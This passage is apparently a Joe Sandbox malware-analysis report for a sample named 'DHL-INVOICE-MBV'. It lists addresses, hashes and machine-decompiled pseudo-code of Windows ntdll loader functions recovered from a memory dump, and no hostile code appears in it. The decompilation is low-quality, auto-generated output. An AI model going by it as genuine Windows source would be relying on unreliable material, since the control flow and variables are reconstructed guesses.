0x1d7c973c
0x1d7c973e
0x1d7c9742
0x1d7c9747
0x1d7c97bc
0x1d7c97bc
0x1d7c97bc
0x1d7c97bc
0x1d7c97c0
0x1d7c97c5
0x1d7c97c5
0x1d7c97cb
0x1d7c9900
0x1d7c9908
0x1d7c9913
0x1d7c9914
0x1d7c9916
0x1d7c9918
0x1d7c9918
0x1d7c97d6
0x1d7c97db
0x1d7c97dd
0x1d7c97dd
0x1d7c97e1
0x1d7c97e3
0x00000000
0x00000000
0x1d7c97e5
0x1d7c97e5
0x1d7c97e8
0x1d7c97ec
0x1d7c97ee
0x1d7c97f1
0x1d7c97f4
0x1d7c97f9
0x1d7c97fb
0x1d7c9922
0x1d7c9928
0x1d7c9928
0x1d7c9803
0x1d7c9805
0x1d7c980a
0x1d7c980e
0x1d7c9815
0x1d80dade
0x1d80dae0
0x1d80dae0
0x1d7c9815
0x1d7c981b
0x1d7c9822
0x1d80daea
0x1d80db04
0x1d80db09
0x1d80db09
0x1d7c9828
0x1d7c982a
0x1d7c982d
0x1d7c9836
0x1d7c9836
0x1d7c983a
0x1d7c983f
0x1d7c9755
0x1d7c9755
0x1d7c9755
0x1d7c975a
0x00000000
0x00000000
0x1d7c986e
0x1d7c9870
0x1d7c9872
0x1d7c992f
0x1d7c9931
0x1d7c9878
0x1d7c9878
0x1d7c9878
0x1d7c9878
0x1d7c9878
0x1d7c987c
0x1d7c987e
0x00000000
0x1d7c9884
0x1d7c9889
0x1d7c988e
0x1d7c9891
0x1d7c9891
0x1d7c9894
0x1d7c9897
0x1d7c9899
0x1d7c989d
0x1d7c989f
0x1d7c98b1
0x1d7c98b3
0x1d7c98b5
0x1d7c98b8
0x1d7c98c0
0x1d7c98c2
0x1d7c98c2
0x1d7c98c4
0x1d7c98c4
0x1d7c98cd
0x1d7c98d0
0x1d7c98da
0x1d7c98df
0x1d7c98e4
0x1d7c98e8
0x1d7c98e8
0x1d7c98f6
0x00000000
0x1d7c98f6
0x1d7c98a1
0x1d7c98a3
0x1d7c98a3
0x1d7c98a5
0x1d7c98a7
0x1d7c98a9
0x1d7c98a9
0x1d7c98ad
0x00000000
0x1d7c98ad
0x1d7c987e
0x1d7c9760
0x1d7c9762
0x1d7c976b
0x1d7c97b5
0x1d7c97bb
0x00000000
0x00000000
0x00000000
0x1d7c976d
0x1d7c976d
0x1d7c976d
0x1d7c976f
0x1d7c9777
0x1d7c9782
0x1d7c978b
0x1d7c9849
0x1d7c9852
0x1d7c9857
0x1d7c9860
0x1d7c9865
0x1d7c9865
0x1d7c9796
0x1d7c97a2
0x1d80db13
0x1d80db13
0x1d7c97aa
0x1d7c97af
0x1d7c97b1
0x00000000
0x1d7c976d
0x1d7c974d
0x00000000
0x00000000
0x1d7c9753
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7C9922

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 1D80DAFF
Unmapping DLL "%wZ", xrefs: 1D80DAEE
LdrpUnloadNode, xrefs: 1D80DAF5

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 0ea63cd9eaf1a1ffd7451359be6f653c2f0a974c0d172de5dc52aac8050ce645
Instruction ID: f7795eb2a28738fdc873f4fc2fc11696ef8fb97afec04316e9b94865ce87f5d8
Opcode Fuzzy Hash: 0ea63cd9eaf1a1ffd7451359be6f653c2f0a974c0d172de5dc52aac8050ce645
Instruction Fuzzy Hash: F85112357096039FC769DF38DC88B6973E0BB88735F15062EE5968B6A1D730A844CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E1D7DC640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E1D7C0130();
				if(_t25 != 0) {
					L1D7B2330(_t25, 0x1d895b5c);
					_t27 =  *0x1d899224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E1D799050( *0x1d89921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E1D7B24D0(0x1d895b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x1d89b370 ^ _t87;
							_t76 = _t65;
							 *0x1d8991e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x1d89660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E1D82CB20(0x1d895b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x1d896608 & 0x0000ffff) + 2 + _t67;
									_t42 = E1D7B5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E1D7C10D0(_t67,  &_v572, 0x1d896608);
										E1D7C10D0(_t67,  &_v580,  &_v572);
										E1D7AFE40(_t67,  &_v588, ";");
										E1D7B3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d89660c);
										 *0x1d896608 = _v608;
										_t54 = _v604;
										 *0x1d89660c = _t54;
										 *0x1d896604 = _t54;
										E1D82D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x1d8937c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D81E692();
											_t56 =  *0x1d8937c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E1D7E4B50(_t39, 0x1d895b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x1d899224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E1D799050( *0x1d89921c, 1);
								}
							}
							_t25 = E1D7B24D0(0x1d895b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x1d7dc640
0x1d7dc642
0x1d7dc644
0x1d7dc645
0x1d7dc647
0x1d7dc64e
0x1d7dc65a
0x1d7dc65f
0x1d7dc664
0x1d7dc666
0x1d7dc668
0x1d7dc6a4
0x1d7dc6a6
0x00000000
0x1d7dc6a8
0x1d7dc6a8
0x00000000
0x1d7dc6a8
0x1d7dc66a
0x1d7dc66a
0x1d7dc66c
0x1d7dc675
0x1d7dc675
0x1d7dc67a
0x1d7dc67d
0x1d7dc6ab
0x1d7dc6ac
0x1d7dc6b3
0x1d7dc6b4
0x1d7dc6be
0x1d7dc6cb
0x1d7dc6dc
0x1d7dc6df
0x1d7dc6e9
0x1d7dc6e9
0x1d7dc6eb
0x1d818090
0x1d81809b
0x1d8180a4
0x1d8180a9
0x1d8180ae
0x1d81817f
0x1d818183
0x1d818188
0x1d818189
0x00000000
0x1d8180b4
0x1d8180c4
0x1d8180cc
0x1d8180d1
0x1d8180d5
0x1d8180d7
0x1d818114
0x1d818116
0x1d81811b
0x1d81812a
0x1d818139
0x1d818148
0x1d81815e
0x1d818167
0x1d81816c
0x1d818170
0x1d818175
0x1d81817a
0x00000000
0x1d8180d9
0x1d8180d9
0x1d8180de
0x1d8180e0
0x1d8180e2
0x1d8180e7
0x1d8180e9
0x1d8180ee
0x1d8180f3
0x1d8180f8
0x1d8180fd
0x1d818102
0x1d818102
0x1d818105
0x1d818107
0x1d818109
0x1d818109
0x1d81810a
0x1d81810a
0x1d8180d7
0x1d7dc6f1
0x1d7dc6f1
0x1d7dc6f1
0x1d7dc6f1
0x1d7dc6f1
0x1d7dc6fa
0x1d7dc6fb
0x1d7dc705
0x1d7dc67f
0x1d7dc67f
0x1d7dc67f
0x1d7dc680
0x1d7dc680
0x1d7dc685
0x1d7dc687
0x1d7dc689
0x1d7dc68b
0x1d7dc68d
0x1d7dc697
0x1d7dc697
0x1d7dc68d
0x1d7dc69d
0x00000000
0x1d7dc69d
0x1d7dc67d
0x1d7dc650
0x1d7dc650
0x1d7dc653
0x1d7dc653

APIs

RtlDebugPrintTimes.NTDLL ref: 1D7DC6DF

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 1D8180E9
Failed to reallocate the system dirs string !, xrefs: 1D8180E2
minkernel\ntdll\ldrinit.c, xrefs: 1D8180F3

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: a2431a07a563c3792c93890284492c95f06e774de3253bac81e45966d39dae03
Instruction ID: ec66f6ac1e5c75339ac1b83b9d7294d587b088e00686fdcd69da44353c66f222
Opcode Fuzzy Hash: a2431a07a563c3792c93890284492c95f06e774de3253bac81e45966d39dae03
Instruction Fuzzy Hash: 9A411476508311AFC719DB64DC85B5B77F8AF88660F01592AF998D7260EB34E800CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1D8243D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1D8243D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E1D824B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x1d896714; // 0x0
				_v16 = _t68;
				_t69 =  *0x1d896710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x1d896710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E1D824528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E1D824528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x1d895ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x1d8937c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x1d8937c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E1D81E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x1d8991e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x1d8243e2
0x1d8243e5
0x1d8243e7
0x1d8243f3
0x1d8243fa
0x1d824401
0x1d82440b
0x1d82440f
0x1d824414
0x1d824418
0x1d824420
0x1d824424
0x1d82442e
0x1d82442e
0x1d824426
0x1d824426
0x1d824426
0x1d824424
0x1d824433
0x1d82445e
0x1d824443
0x1d824445
0x1d82444b
0x00000000
0x1d8244c0
0x1d82446a
0x1d82446f
0x1d824471
0x00000000
0x00000000
0x1d824473
0x1d824479
0x1d82447b
0x1d8244d4
0x1d8244d4
0x1d8244db
0x1d8244de
0x1d8244e6
0x1d8244e9
0x1d8244ef
0x1d8244f9
0x1d8244fc
0x1d8244ff
0x1d824502
0x1d82451e
0x1d824523
0x1d8244c9
0x1d8244d1
0x1d8244d1
0x1d824489
0x1d82448f
0x1d824491
0x1d824493
0x00000000
0x00000000
0x1d824495
0x1d824498
0x1d82449a
0x1d82449c
0x1d8244b8
0x1d8244bb
0x1d8244bb
0x1d8244be
0x00000000
0x00000000
0x1d8244b2
0x1d8244b4
0x00000000
0x00000000
0x1d8244b6
0x1d8244b6
0x00000000
0x1d8244b8
0x1d82449e
0x1d8244a0
0x1d8244a2
0x1d8244a4
0x00000000
0x00000000
0x00000000
0x00000000
0x1d8244a6
0x1d8244a6
0x1d8244a6
0x1d8244a8
0x1d8244aa
0x1d8244ac
0x1d8244ac
0x1d8244b0
0x1d8244c4
0x00000000
0x1d8244c4
0x1d82444d
0x1d824450
0x1d824450
0x1d824452
0x1d82445c
0x1d82445c
0x00000000
0x1d82445c
0x1d824454
0x1d824456
0x00000000
0x00000000
0x1d824458
0x00000000
0x1d824458
0x1d824447
0x00000000
0x1d824447
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D824489

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D824508
minkernel\ntdll\ldrredirect.c, xrefs: 1D824519
LdrpCheckRedirection, xrefs: 1D82450F

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: dc7b8cdaa8ad46caaad3571936647a0f9f1fbed1a9f486e4bb221277ad4c2477
Instruction ID: c67fd318dd752a339669b0fd669f3b1e77b388440357f315d0b433a36c3d968a
Opcode Fuzzy Hash: dc7b8cdaa8ad46caaad3571936647a0f9f1fbed1a9f486e4bb221277ad4c2477
Instruction Fuzzy Hash: 8D41B0726062219BCB15CF5CC940E2677F4BFA8A50F86465AFCD897255D730E880CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 1D825B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E1D825B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E1D7BDDA0(0, 0, 0x1d771b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(E1D7BCF00(_t36, _t38, _v8, 0x1d771b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(E1D7BCF00(_t36, _t38, _v8, 0x1d771b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(E1D7BCF00(_t36, _t38, _v8, 0x1d771b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x1d8991e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x1d8991e0(_t40, 4, 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x1d8991e0(_t40);
								_v20();
							}
						}
					}
				}
				return E1D7BCD80(_t36, _t43);
			}

0x1d825b90
0x1d825ba6
0x1d825bad
0x1d825c51
0x1d825c51
0x1d825bb7
0x1d825bcd
0x1d825bd2
0x1d825be8
0x1d825bed
0x1d825c03
0x1d825c05
0x1d825c0f
0x1d825c18
0x1d825c1c
0x1d825c31
0x1d825c37
0x1d825c3a
0x1d825c3e
0x1d825c44
0x1d825c44
0x1d825c47
0x1d825c03
0x1d825be8
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1D825C0F
RtlDebugPrintTimes.NTDLL ref: 1D825C31
RtlDebugPrintTimes.NTDLL ref: 1D825C3E

Strings

Wow64 Emulation Layer, xrefs: 1D825C09

Memory Dump Source

Source File: 00000003.00000002.18146591431.000000001D770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D770000, based on PE: true

Associated: 00000003.00000002.18149183497.000000001D899000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.18149218359.000000001D89D000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d770000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: cf3f4940ee35a0be809b094087fb07c289c55385f79c7363bb6f9f84fb65d33d
Instruction ID: b7b79e01f91ca59b4201b28d81f91d9bbf8489790047f13131054bfef1178e45
Opcode Fuzzy Hash: cf3f4940ee35a0be809b094087fb07c289c55385f79c7363bb6f9f84fb65d33d
Instruction Fuzzy Hash: D5212C7650015DFFEB059AA4DD88DFF7B7DEF482A9F014595FA01A2110E630AE01DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D81EBD0 Relevance: 6.2, APIs: 4, Instructions: 187
timeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E1D81EBD0(void* __ebx, intOrPtr __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr _t94;
				intOrPtr _t95;
				short* _t115;
				intOrPtr* _t118;
				intOrPtr _t125;
				intOrPtr _t127;
				signed char _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr* _t136;
				intOrPtr _t139;
				void* _t141;

				_t128 = __edx;
				_push(0x58);
				_push(0x1d87cc00);
				E1D7F7BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t141 - 0x40)) = __edx;
				_t135 = __ecx;
				 *((intOrPtr*)(_t141 - 0x20)) = __ecx;
				_t118 = 2;
				 *((intOrPtr*)(_t141 - 0x28)) = _t118;
				 *(_t141 - 0x68) =  *(_t141 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x1d81f550;
				 *((intOrPtr*)(_t141 - 0x60)) = E1D81F5D0;
				if( *((intOrPtr*)(_t141 + 0xc)) >= _t118) {
					_t115 =  *((intOrPtr*)(_t141 + 8));
					 *_t115 = 0;
					_t132 = 0;
				} else {
					_t132 = 0xc0000004;
					_t115 = 0;
				}
				 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
				 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
				if(_t135 == 0 || (_t128 & 0x00000002) != 0) {
					_t135 = _t141 - 0x68;
					 *((intOrPtr*)(_t141 - 0x20)) = _t135;
				}
				 *((intOrPtr*)(_t141 - 0x4c)) = _t135;
				_t84 = 0;
				_t136 =  *((intOrPtr*)(_t141 + 0x10));
				while(1) {
					 *(_t141 - 0x2c) = _t84;
					if(_t84 >= 1) {
						break;
					}
					 *((intOrPtr*)(_t141 - 0x44)) = 0x2800;
					 *(_t141 - 0x34) = 1;
					if(_t136 != 0) {
						 *_t136 = _t118;
					}
					if((_t128 & 0x00000002) != 0) {
						_t23 = 0x1d7718a4 + _t84 * 0x14; // 0x1d81eaf0
						 *0x1d8991e0();
						 *((intOrPtr*)( *_t23))();
						_t84 =  *(_t141 - 0x2c);
					}
					 *(_t141 - 4) =  *(_t141 - 4) & 0x00000000;
					_t86 = _t84 * 0x14;
					 *(_t141 - 0x38) = _t86;
					_t31 = _t86 + 0x1d771898; // 0x1d81e9f0
					_t136 =  *_t31;
					_t118 = _t136;
					 *0x1d8991e0( *((intOrPtr*)(_t141 - 0x20)), _t141 - 0x30, _t141 - 0x50);
					_t88 =  *_t136();
					if(_t88 < 0) {
						L31:
						_t132 = _t88;
						goto L32;
					} else {
						if( *((intOrPtr*)(_t141 - 0x30)) != 0) {
							_push(_t141 - 0x24);
							_push( *((intOrPtr*)(_t141 - 0x30)));
							_push( *((intOrPtr*)(_t141 - 0x20)));
							_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d77189c));
							while(1) {
								_t118 = _t136;
								 *0x1d8991e0();
								_t88 =  *_t136();
								if(_t88 < 0) {
									goto L31;
								}
								if( *((intOrPtr*)(_t141 - 0x24)) !=  *((intOrPtr*)(_t141 - 0x30))) {
									_t94 =  *((intOrPtr*)(_t141 - 0x44));
									if(_t94 != 0) {
										_t95 = _t94 - 1;
										 *((intOrPtr*)(_t141 - 0x44)) = _t95;
										 *((intOrPtr*)(_t141 - 0x5c)) = _t95;
										_t125 =  *((intOrPtr*)(_t141 - 0x28)) +  *(_t141 - 0x34) * 0x12c;
										 *((intOrPtr*)(_t141 - 0x28)) = _t125;
										 *(_t141 - 0x34) = 1;
										 *((intOrPtr*)(_t141 - 0x58)) = 1;
										if( *((intOrPtr*)(_t141 + 0xc)) >= _t125) {
											 *_t115 = 0x12c;
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d7718a0));
											_t118 = _t136;
											 *0x1d8991e0( *((intOrPtr*)(_t141 - 0x20)), _t115 + 4,  *((intOrPtr*)(_t141 - 0x24)),  *((intOrPtr*)(_t141 - 0x50)),  *((intOrPtr*)(_t141 - 0x40)));
											_t88 =  *_t136();
											if(_t88 < 0) {
												goto L31;
											} else {
												_t128 =  *(_t115 + 0xc);
												if(_t128 == 0) {
													 *(_t141 - 0x34) = 0;
													 *((intOrPtr*)(_t141 - 0x58)) = 0;
													goto L28;
												} else {
													_t128 = _t128 + 0x3c;
													_t136 =  *((intOrPtr*)(_t141 - 0x20));
													_t118 = _t136;
													_t88 = E1D81F5EC(_t118, _t128, _t141 - 0x54, 4);
													if(_t88 < 0) {
														goto L31;
													} else {
														_t127 =  *(_t115 + 0xc) +  *((intOrPtr*)(_t141 - 0x54));
														 *((intOrPtr*)(_t141 - 0x48)) = _t127;
														_t128 = _t127 + 8;
														_t118 = _t136;
														_t88 = E1D81F5EC(_t118, _t128, _t115 + 0x124, 4);
														if(_t88 < 0) {
															goto L31;
														} else {
															_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x58;
															_t118 = _t136;
															_t88 = E1D81F5EC(_t118, _t128, _t115 + 0x120, 4);
															if(_t88 < 0) {
																goto L31;
															} else {
																_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x34;
																_t118 = _t136;
																_t88 = E1D81F5EC(_t118, _t128, _t115 + 0x128, 4);
																if(_t88 < 0) {
																	goto L31;
																} else {
																	_t115 = _t115 + 0x12c;
																	 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
																	 *_t115 = 0;
																	goto L29;
																}
															}
														}
													}
												}
											}
										} else {
											_t132 = 0xc0000004;
											 *((intOrPtr*)(_t141 - 0x1c)) = 0xc0000004;
											L28:
											_t139 =  *((intOrPtr*)(_t141 - 0x20));
											L29:
											_push(_t141 - 0x24);
											_push( *((intOrPtr*)(_t141 - 0x24)));
											_push(_t139);
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d77189c));
											continue;
										}
									} else {
										_t132 = 0xc0000229;
										L32:
										 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
									}
								}
								goto L33;
							}
							goto L31;
						}
					}
					L33:
					 *(_t141 - 4) = 0xfffffffe;
					E1D81EE16();
					_t84 =  *(_t141 - 0x2c) + 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
				return _t132;
			}

0x1d81ebd0
0x1d81ebd0
0x1d81ebd2
0x1d81ebd7
0x1d81ebdc
0x1d81ebdf
0x1d81ebe1
0x1d81ebe6
0x1d81ebe7
0x1d81ebea
0x1d81ebee
0x1d81ebf5
0x1d81ebff
0x1d81ec0a
0x1d81ec0f
0x1d81ec12
0x1d81ec01
0x1d81ec01
0x1d81ec06
0x1d81ec06
0x1d81ec14
0x1d81ec17
0x1d81ec1c
0x1d81ec23
0x1d81ec26
0x1d81ec26
0x1d81ec29
0x1d81ec2c
0x1d81ec2e
0x1d81ec31
0x1d81ec31
0x1d81ec37
0x00000000
0x00000000
0x1d81ec3d
0x1d81ec44
0x1d81ec4d
0x1d81ec4f
0x1d81ec4f
0x1d81ec54
0x1d81ec59
0x1d81ec61
0x1d81ec67
0x1d81ec69
0x1d81ec69
0x1d81ec6c
0x1d81ec70
0x1d81ec73
0x1d81ec81
0x1d81ec81
0x1d81ec87
0x1d81ec89
0x1d81ec8f
0x1d81ec93
0x1d81edf0
0x1d81edf0
0x00000000
0x1d81ec99
0x1d81ec9d
0x1d81eca6
0x1d81eca7
0x1d81ecaa
0x1d81ecb0
0x1d81edde
0x1d81edde
0x1d81ede0
0x1d81ede6
0x1d81edea
0x00000000
0x00000000
0x1d81ecc1
0x1d81ecc7
0x1d81eccc
0x1d81ecd8
0x1d81ecd9
0x1d81ecdc
0x1d81ece9
0x1d81eceb
0x1d81ecf1
0x1d81ecf4
0x1d81ecfa
0x1d81ed0e
0x1d81ed24
0x1d81ed2a
0x1d81ed2c
0x1d81ed32
0x1d81ed36
0x00000000
0x1d81ed3c
0x1d81ed3c
0x1d81ed41
0x1d81edc4
0x1d81edc7
0x00000000
0x1d81ed43
0x1d81ed49
0x1d81ed4c
0x1d81ed4f
0x1d81ed51
0x1d81ed58
0x00000000
0x1d81ed5e
0x1d81ed61
0x1d81ed64
0x1d81ed70
0x1d81ed73
0x1d81ed75
0x1d81ed7c
0x00000000
0x1d81ed7e
0x1d81ed8a
0x1d81ed8d
0x1d81ed8f
0x1d81ed96
0x00000000
0x1d81ed98
0x1d81eda4
0x1d81eda7
0x1d81eda9
